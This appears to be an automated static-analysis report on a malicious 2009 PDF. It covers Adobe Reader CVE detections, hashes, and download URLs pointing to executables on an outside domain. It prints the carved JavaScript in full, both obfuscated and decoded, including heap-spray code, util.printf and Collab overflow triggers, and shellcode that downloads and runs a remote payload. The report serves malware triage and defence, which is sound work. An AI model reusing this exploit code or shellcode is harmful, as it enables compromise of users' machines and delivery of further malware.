Malicious PDF — malware analysis report

Static analysis result for SHA-256 75b3cbd632b4f45f…

MALICIOUS

PDF

7.7 KB Created: 2009-12-02 19:47:96 Authoring application: PDF Library 6.5.10 (via PDF Library 3.4.10)
MD5: c2fa0422063ce39a78f2eeb841952f02 SHA-1: d8d9621a2e81582672f06c17a77a51ca1d599ee3 SHA-256: 75b3cbd632b4f45f88fc0de5131d552384fb339eb1225bcfa9c466d0051b3629
628 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1203 Exploitation for Client Execution

This PDF document exploits multiple known vulnerabilities (CVE-2009-0927, CVE-2007-5659, CVE-2008-2992) through embedded JavaScript. The JavaScript is heavily obfuscated but ultimately contains URLs that are used to download and execute a second-stage payload, likely an executable file. The primary function of the script is to download and execute a payload from the identified URLs.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 13

  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (matched in decompressed stream)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (matched in decompressed stream)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (matched in decompressed stream)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • ASCIIHexDecode filter (with exploit indicators) medium PDF_FILTER_HEX
    Hex-encoding filter present alongside exploit delivery indicators — often used to hide payload or shellcode bytes
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://addvertseense.co.uk/tcyzq2.exe Referenced by PDF JavaScript
    • http://addvertseense.co.uk/click.php?r=Referenced by PDF JavaScript
    • http://addvertseense.co.uk/cpqt2.exeReferenced by PDF JavaScript
    • http://addvertseense.co.uk/xgwizs2.exeReferenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0007_000.js
a30a6bf7a05f2a0befd98f81ef2e1ea90664c9f59526e86eb715c30e3e3b9497		 pdf-javascript-stream PDF /JS object 7 at offset 0x268 37665 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long hex-escaped blob(s).
Preview script
First 1,000 lines of the extracted script
app["\x65\x76\x61\x6c"]("\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x66\x69\x78\x5f\x69\x74\x28\x79\x61\x72\x73\x70\x2c\x6c\x65\x6e\x29\x7b\x77\x68\x69\x6c\x65\x28\x79\x61\x72\x73\x70\x2e\x6c\x65\x6e\x67\x74\x68\x2a\x32\x3c\x6c\x65\x6e\x29\x7b\x79\x61\x72\x73\x70\x2b\x3d\x79\x61\x72\x73\x70\x3b\x7d\x0a\x79\x61\x72\x73\x70\x3d\x79\x61\x72\x73\x70\x2e\x73\x75\x62\x73\x74\x72\x69\x6e\x67\x28\x30\x2c\x6c\x65\x6e\x2f\x32\x29\x3b\x72\x65\x74\x75\x72\x6e\x20\x79\x61\x72\x73\x70\x3b\x7d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x75\x74\x69\x6c\x5f\x70\x72\x69\x6e\x74\x66\x28\x29\x7b\x76\x61\x72\x20\x70\x61\x79\x6c\x6f\x61\x64\x3d\x75\x6e\x65\x73\x63\x61\x70\x65\x28\x22\x25\x75\x45\x42\x45\x39\x25\x75\x30\x30\x30\x31\x25\x75\x35\x36\x30\x30\x25\x75\x41\x31\x36\x34\x25\x75\x30\x30\x33\x30\x25\x75\x30\x30\x30\x30\x25\x75\x34\x30\x38\x42\x25\x75\x38\x42\x30\x43\x25\x75\x31\x43\x37\x30\x25\x75\x38\x42\x41\x44\x25\x75\x30\x38\x34\x30\x25\x75\x43\x33\x35\x45\x25\x75\x38\x42\x35\x35\x25\x75\x38\x42\x45\x43\x25\x75\x30\x38\x34\x35\x25\x75\x33\x33\x35\x32\x25\x75\x43\x31\x44\x32\x25\x75\x30\x33\x43\x32\x25\x75\x31\x30\x33\x32\x25\x75\x38\x30\x34\x30\x25\x75\x30\x30\x33\x38\x25\x75\x46\x35\x37\x35\x25\x75\x43\x32\x38\x42\x25\x75\x35\x44\x35\x41\x25\x75\x30\x34\x43\x32\x25\x75\x35\x35\x30\x30\x25\x75\x45\x43\x38\x42\x25\x75\x35\x31\x35\x31\x25\x75\x35\x36\x35\x33\x25\x75\x36\x30\x35\x37\x25\x75\x35\x44\x38\x42\x25\x75\x33\x33\x30\x38\x25\x75\x38\x42\x43\x30\x25\x75\x30\x43\x37\x35\x25\x75\x46\x45\x38\x42\x25\x75\x37\x36\x30\x33\x25\x75\x38\x42\x33\x43\x25\x75\x37\x38\x34\x45\x25\x75\x43\x46\x30\x33\x25\x75\x35\x31\x38\x42\x25\x75\x35\x32\x31\x43\x25\x75\x35\x31\x38\x42\x25\x75\x35\x32\x32\x34\x25\x75\x37\x31\x38\x42\x25\x75\x34\x45\x31\x34\x25\x75\x37\x35\x38\x39\x25\x75\x38\x42\x46\x43\x25\x75\x32\x30\x37\x31\x25\x75\x46\x37\x30\x33\x25\x75\x34\x41\x39\x39\x25\x75\x34\x32\x41\x44\x25\x75\x33\x42\x36\x30\x25\x75\x46\x43\x35\x35\x25\x75\x30\x34\x37\x35\x25\x75\x43\x30\x33\x33\x25\x75\x33\x37\x45\x42\x25\x75\x46\x46\x33\x33\x25\x75\x34\x35\x30\x33\x25\x75\x39\x37\x30\x43\x25\x75\x43\x46\x38\x42\x25\x75\x37\x35\x41\x45\x25\x75\x32\x42\x46\x44\x25\x75\x34\x46\x46\x39\x25\x75\x45\x38\x35\x31\x25\x75\x46\x46\x39\x34\x25\x75\x46\x46\x46\x46\x25\x75\x43\x33\x33\x42\x25\x75\x37\x34\x36\x31\x25\x75\x45\x42\x30\x32\x25\x75\x38\x42\x44\x39\x25\x75\x30\x43\x34\x35\x25\x75\x35\x45\x39\x32\x25\x75\x46\x32\x30\x33\x25\x75\x45\x30\x44\x31\x25\x75\x43\x36\x30\x33\x25\x75\x43\x39\x33\x33\x25\x75\x42\x37\x30\x46\x25\x75\x35\x46\x30\x38\x25\x75\x45\x31\x43\x31\x25\x75\x30\x33\x30\x32\x25\x75\x30\x33\x43\x41\x25\x75\x38\x42\x43\x46\x25\x75\x30\x33\x30\x31\x25\x75\x38\x39\x43\x32\x25\x75\x46\x38\x34\x35\x25\x75\x38\x42\x36\x31\x25\x75\x46\x38\x34\x35\x25\x75\x35\x45\x35\x46\x25\x75\x43\x39\x35\x42\x25\x75\x35\x35\x43\x33\x25\x75\x45\x43\x38\x42\x25\x75\x45\x38\x35\x31\x25\x75\x46\x46\x34\x39\x25\x75\x46\x46\x46\x46\x25\x75\x36\x38\x35\x30\x25\x75\x36\x30\x45\x38\x25\x75\x30\x34\x42\x46\x25\x75\x36\x43\x45\x38\x25\x75\x46\x46\x46\x46\x25\x75\x33\x33\x46\x46\x25\x75\x35\x32\x44\x32\x25\x75\x46\x46\x35\x32\x25\x75\x30\x38\x37\x35\x25\x75\x44\x30\x46\x46\x25\x75\x34\x35\x38\x39\x25\x75\x38\x42\x46\x43\x25\x75\x46\x43\x34\x35\x25\x75\x43\x33\x43\x39\x25\x75\x38\x42\x35\x35\x25\x75\x38\x33\x45\x43\x25\x75\x30\x43\x45\x43\x25\x75\x34\x35\x38\x44\x25\x75\x35\x30\x46\x34\x25\x75\x34\x35\x43\x36\x25\x75\x37\x35\x46\x34\x25\x75\x34\x35\x43\x36\x25\x75\x37\x32\x46\x35\x25\x75\x34\x35\x43\x36\x25\x75\x36\x43\x46\x36\x25\x75\x34\x35\x43\x36\x25\x75\x36\x44\x46\x37\x25\x75\x34\x35\x43\x36\x25\x75\x36\x46\x46\x38\x25\x75\x34\x35\x43\x36\x25\x75\x36\x45\x46\x39\x25\x75\x34\x35\x43\x36\x25\x75\x32\x45\x46\x41\x25\x75\x34\x35\x43\x36\x25\x75\x36\x34\x46\x42\x25\x75\x34\x35\x43\x36\x25\x75\x36\x43\x46\x43\x25\x75\x34\x35\x43\x36\x25\x75\x36\x43\x46\x44\x25\x75\x34\x35\x43\x36\x25\x75\x30\x30\x46\x45\x25\x75\x41\x30\x45\x38\x25\x75\x46\x46\x46\x46\x25\x75\x35\x30\x46\x46\x25\x75\x35\x44\x36\x38\x25\x75\x31\x31\x38\x41\x25\x75\x45\x38\x31\x36\x25\x75\x46\x46\x31\x35\x25\x75\x46\x46\x46\x46\x2
... (truncated)
generic_stage_recovery_000.js
37953ed4aad030ef4d8dd102a6318e768046cb4324e3d3e6ced562b940f38801		 deobfuscated-js generic stage recovery percent-decode from decompressed stream at 0x2B2 at offset 0x2B2 9425 bytes
Detection
ClamAV: Js.Exploit.Shellcode-18
Obfuscation or payload: likely
Carved artifact contains 9 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
app["eval"]("function fix_it(yarsp,len){while(yarsp.length*2<len){yarsp+=yarsp;}
yarsp=yarsp.substring(0,len/2);return yarsp;}
function util_printf(){var payload=unescape("%uEBE9%u0001%u5600%uA164%u0030%u0000%u408B%u8B0C%u1C70%u8BAD%u0840%uC35E%u8B55%u8BEC%u0845%u3352%uC1D2%u03C2%u1032%u8040%u0038%uF575%uC28B%u5D5A%u04C2%u5500%uEC8B%u5151%u5653%u6057%u5D8B%u3308%u8BC0%u0C75%uFE8B%u7603%u8B3C%u784E%uCF03%u518B%u521C%u518B%u5224%u718B%u4E14%u7589%u8BFC%u2071%uF703%u4A99%u42AD%u3B60%uFC55%u0475%uC033%u37EB%uFF33%u4503%u970C%uCF8B%u75AE%u2BFD%u4FF9%uE851%uFF94%uFFFF%uC33B%u7461%uEB02%u8BD9%u0C45%u5E92%uF203%uE0D1%uC603%uC933%uB70F%u5F08%uE1C1%u0302%u03CA%u8BCF%u0301%u89C2%uF845%u8B61%uF845%u5E5F%uC95B%u55C3%uEC8B%uE851%uFF49%uFFFF%u6850%u60E8%u04BF%u6CE8%uFFFF%u33FF%u52D2%uFF52%u0875%uD0FF%u4589%u8BFC%uFC45%uC3C9%u8B55%u83EC%u0CEC%u458D%u50F4%u45C6%u75F4%u45C6%u72F5%u45C6%u6CF6%u45C6%u6DF7%u45C6%u6FF8%u45C6%u6EF9%u45C6%u2EFA%u45C6%u64FB%u45C6%u6CFC%u45C6%u6CFD%u45C6%u00FE%uA0E8%uFFFF%u50FF%u5D68%u118A%uE816%uFF15%uFFFF%uC483%u850C%u74C0%u6A15%u6A00%uFF00%u0C75%u75FF%u6A08%uFF00%u85D0%u75C0%u4003%uC3C9%uC033%uC3C9%u3357%u8BC0%u244C%u8B0C%u247C%uFC08%uAAF3%uC35F%u4C8B%u0424%u3980%u8B00%u74C1%u4006%u3880%u7500%u2BFA%uC3C1%u8B55%u83EC%u64EC%u8D53%uF045%u3357%u50DB%u45C6%u6BF0%u45C6%u65F1%u45C6%u72F2%u45C6%u6EF3%u45C6%u65F4%u45C6%u6CF5%u45C6%u33F6%u45C6%u32F7%u45C6%u2EF8%u45C6%u64F9%u45C6%u6CFA%u45C6%u6CFB%u5D88%uE8FC%uFF0B%uFFFF%u6850%u4368%u8EF9%u80E8%uFFFE%u8BFF%u8DF8%u9C45%u446A%uE850%uFF7E%uFFFF%u458D%u6AE0%u5010%u73E8%uFFFF%u83FF%u1CC4%u458D%u50E0%u458D%u509C%u5353%u5353%u5353%u75FF%uC708%u9C45%u0044%u0000%uFF53%u5FD7%uB60F%u5BC0%uC3C9%u8B55%u51EC%u5351%u5756%u426A%u72E8%u0000%u8B00%u33D8%u85F6%u59DB%u45C7%u61F8%u652E%uC778%uFC45%u0065%u0000%u567E%u458D%u50F8%uE856%u0051%u0000%u5059%uB1E8%uFFFE%u85FF%u59C0%u7459%u8D39%u0146%uE850%u003B%u0000%uF88B%u458D%u50F8%u21E8%uFFFF%u85FF%u59C0%u7459%u570C%u01E8%uFFFF%u59FF%u44C6%uFF38%u5073%u458D%uFEF8%u5800%u458D%u50F8%uE857%uFE74%uFFFF%u5959%u4646%uF33B%uAA7C%u5E5F%uC95B%u55C3%uEC8B%u5351%u6066%u32B1%u00E8%u0000%u5800%u0838%u0374%uEB40%u40F9%u5D8B%u8008%u42FB%u0875%uDB33%u188A%uC38B%u17EB%u1838%u1176%u3340%u84C9%u74DB%u400C%u0838%uFB75%uFE40%uEBCB%u33F2%u89C0%uFC45%u458B%u5BFC%uC3C9%u0232%u7468%u7074%u2F3A%u612F%u6464%u6576%u7472%u6573%u6E65%u6573%u632E%u2E6F%u6B75%u742F%u7963%u717A%u2E32%u7865%u0065%u7468%u7074%u2F3A%u612F%u6464%u6576%u7472%u6573%u6E65%u6573%u632E%u2E6F%u6B75%u632F%u696C%u6B63%u702E%u7068%u723F%u003D");var nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A")
var heapblock=nop+payload;var bigblock=unescape("%u0A0A%u0A0A");var headersize=20;var spray=headersize+heapblock.length;while(bigblock.length<spray){bigblock+=bigblock;}
var fillblock=bigblock.substring(0,spray);var block=bigblock.substring(0,bigblock.length-spray);while(block.length+spray<0x40000){block=block+block+fillblock;}
var mem_array=new Array();for(var i=0;i<1400;i++){mem_array[i]=block+heapblock;}
var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;util.printf("E000f",num);}
function collab_email(){var shellcode=unescape("%uEBE9%u0001%u5600%uA164%u0030%u0000%u408B%u8B0C%u1C70%u8BAD%u0840%uC35E%u8B55%u8BEC%u0845%u3352%uC1D2%u03C2%u1032%u8040%u0038%uF575%uC28B%u5D5A%u04C2%u5500%uEC8B%u5151%u5653%u6057%u5D8B%u3308%u8BC0%u0C75%uFE8B%u7603%u8B3C%u784E%uCF03%u518B%u521C%u518B%u5224%u718B%u4E14%u7589%u8BFC%u2071%uF703%u4A99%u42AD%u3B60%uFC55%u0475%uC033%u37EB%uFF33%u4503%u970C%uCF8B%u75AE%u2BFD%u4FF9%uE851%uFF94%uFFFF%uC33B%u7461%uEB02%u8BD9%u0C45%u5E92%uF203%uE0D1%uC603%uC933%uB70F%u5F08%uE1C1%u0302%u03CA%u8BCF%u0301%u89C2%uF845%u8B61%uF845%u5E5F%uC95B%u55C3%uEC8B%uE851%uFF49%uFFFF%u6850%u60E8%u04BF%u6CE8%uFFFF%u33FF%u52D2%uFF52%u0875%uD0FF%u4589%u8BFC%uFC45%uC3C9%u8B55%u83EC%u0CEC%u458D%u50F4%u45C6%u75F4%u45C6%u72F5%u45C6%u6CF6%u45C6%u6DF7%u45C6%u6FF8%u45C6%u6EF9%u45C6%
... (truncated)
eval_hex_string_stage_000.js
e03974a8813dd98f4de0237ddc610061b9e558bda7349ef0d974fe8ed1aeb8b6		 deobfuscated-js eval hex-string decoded JavaScript at offset 0x280 9408 bytes
Detection
ClamAV: Js.Exploit.Shellcode-18
Obfuscation or payload: likely
Carved artifact contains 9 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function fix_it(yarsp,len){while(yarsp.length*2<len){yarsp+=yarsp;}
yarsp=yarsp.substring(0,len/2);return yarsp;}
function util_printf(){var payload=unescape("%uEBE9%u0001%u5600%uA164%u0030%u0000%u408B%u8B0C%u1C70%u8BAD%u0840%uC35E%u8B55%u8BEC%u0845%u3352%uC1D2%u03C2%u1032%u8040%u0038%uF575%uC28B%u5D5A%u04C2%u5500%uEC8B%u5151%u5653%u6057%u5D8B%u3308%u8BC0%u0C75%uFE8B%u7603%u8B3C%u784E%uCF03%u518B%u521C%u518B%u5224%u718B%u4E14%u7589%u8BFC%u2071%uF703%u4A99%u42AD%u3B60%uFC55%u0475%uC033%u37EB%uFF33%u4503%u970C%uCF8B%u75AE%u2BFD%u4FF9%uE851%uFF94%uFFFF%uC33B%u7461%uEB02%u8BD9%u0C45%u5E92%uF203%uE0D1%uC603%uC933%uB70F%u5F08%uE1C1%u0302%u03CA%u8BCF%u0301%u89C2%uF845%u8B61%uF845%u5E5F%uC95B%u55C3%uEC8B%uE851%uFF49%uFFFF%u6850%u60E8%u04BF%u6CE8%uFFFF%u33FF%u52D2%uFF52%u0875%uD0FF%u4589%u8BFC%uFC45%uC3C9%u8B55%u83EC%u0CEC%u458D%u50F4%u45C6%u75F4%u45C6%u72F5%u45C6%u6CF6%u45C6%u6DF7%u45C6%u6FF8%u45C6%u6EF9%u45C6%u2EFA%u45C6%u64FB%u45C6%u6CFC%u45C6%u6CFD%u45C6%u00FE%uA0E8%uFFFF%u50FF%u5D68%u118A%uE816%uFF15%uFFFF%uC483%u850C%u74C0%u6A15%u6A00%uFF00%u0C75%u75FF%u6A08%uFF00%u85D0%u75C0%u4003%uC3C9%uC033%uC3C9%u3357%u8BC0%u244C%u8B0C%u247C%uFC08%uAAF3%uC35F%u4C8B%u0424%u3980%u8B00%u74C1%u4006%u3880%u7500%u2BFA%uC3C1%u8B55%u83EC%u64EC%u8D53%uF045%u3357%u50DB%u45C6%u6BF0%u45C6%u65F1%u45C6%u72F2%u45C6%u6EF3%u45C6%u65F4%u45C6%u6CF5%u45C6%u33F6%u45C6%u32F7%u45C6%u2EF8%u45C6%u64F9%u45C6%u6CFA%u45C6%u6CFB%u5D88%uE8FC%uFF0B%uFFFF%u6850%u4368%u8EF9%u80E8%uFFFE%u8BFF%u8DF8%u9C45%u446A%uE850%uFF7E%uFFFF%u458D%u6AE0%u5010%u73E8%uFFFF%u83FF%u1CC4%u458D%u50E0%u458D%u509C%u5353%u5353%u5353%u75FF%uC708%u9C45%u0044%u0000%uFF53%u5FD7%uB60F%u5BC0%uC3C9%u8B55%u51EC%u5351%u5756%u426A%u72E8%u0000%u8B00%u33D8%u85F6%u59DB%u45C7%u61F8%u652E%uC778%uFC45%u0065%u0000%u567E%u458D%u50F8%uE856%u0051%u0000%u5059%uB1E8%uFFFE%u85FF%u59C0%u7459%u8D39%u0146%uE850%u003B%u0000%uF88B%u458D%u50F8%u21E8%uFFFF%u85FF%u59C0%u7459%u570C%u01E8%uFFFF%u59FF%u44C6%uFF38%u5073%u458D%uFEF8%u5800%u458D%u50F8%uE857%uFE74%uFFFF%u5959%u4646%uF33B%uAA7C%u5E5F%uC95B%u55C3%uEC8B%u5351%u6066%u32B1%u00E8%u0000%u5800%u0838%u0374%uEB40%u40F9%u5D8B%u8008%u42FB%u0875%uDB33%u188A%uC38B%u17EB%u1838%u1176%u3340%u84C9%u74DB%u400C%u0838%uFB75%uFE40%uEBCB%u33F2%u89C0%uFC45%u458B%u5BFC%uC3C9%u0232%u7468%u7074%u2F3A%u612F%u6464%u6576%u7472%u6573%u6E65%u6573%u632E%u2E6F%u6B75%u742F%u7963%u717A%u2E32%u7865%u0065%u7468%u7074%u2F3A%u612F%u6464%u6576%u7472%u6573%u6E65%u6573%u632E%u2E6F%u6B75%u632F%u696C%u6B63%u702E%u7068%u723F%u003D");var nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A")
var heapblock=nop+payload;var bigblock=unescape("%u0A0A%u0A0A");var headersize=20;var spray=headersize+heapblock.length;while(bigblock.length<spray){bigblock+=bigblock;}
var fillblock=bigblock.substring(0,spray);var block=bigblock.substring(0,bigblock.length-spray);while(block.length+spray<0x40000){block=block+block+fillblock;}
var mem_array=new Array();for(var i=0;i<1400;i++){mem_array[i]=block+heapblock;}
var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;util.printf("%45000f",num);}
function collab_email(){var shellcode=unescape("%uEBE9%u0001%u5600%uA164%u0030%u0000%u408B%u8B0C%u1C70%u8BAD%u0840%uC35E%u8B55%u8BEC%u0845%u3352%uC1D2%u03C2%u1032%u8040%u0038%uF575%uC28B%u5D5A%u04C2%u5500%uEC8B%u5151%u5653%u6057%u5D8B%u3308%u8BC0%u0C75%uFE8B%u7603%u8B3C%u784E%uCF03%u518B%u521C%u518B%u5224%u718B%u4E14%u7589%u8BFC%u2071%uF703%u4A99%u42AD%u3B60%uFC55%u0475%uC033%u37EB%uFF33%u4503%u970C%uCF8B%u75AE%u2BFD%u4FF9%uE851%uFF94%uFFFF%uC33B%u7461%uEB02%u8BD9%u0C45%u5E92%uF203%uE0D1%uC603%uC933%uB70F%u5F08%uE1C1%u0302%u03CA%u8BCF%u0301%u89C2%uF845%u8B61%uF845%u5E5F%uC95B%u55C3%uEC8B%uE851%uFF49%uFFFF%u6850%u60E8%u04BF%u6CE8%uFFFF%u33FF%u52D2%uFF52%u0875%uD0FF%u4589%u8BFC%uFC45%uC3C9%u8B55%u83EC%u0CEC%u458D%u50F4%u45C6%u75F4%u45C6%u72F5%u45C6%u6CF6%u45C6%u6DF7%u45C6%u6FF8%u45C6%u6EF9%u45C6%u2EFA%u45C6
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.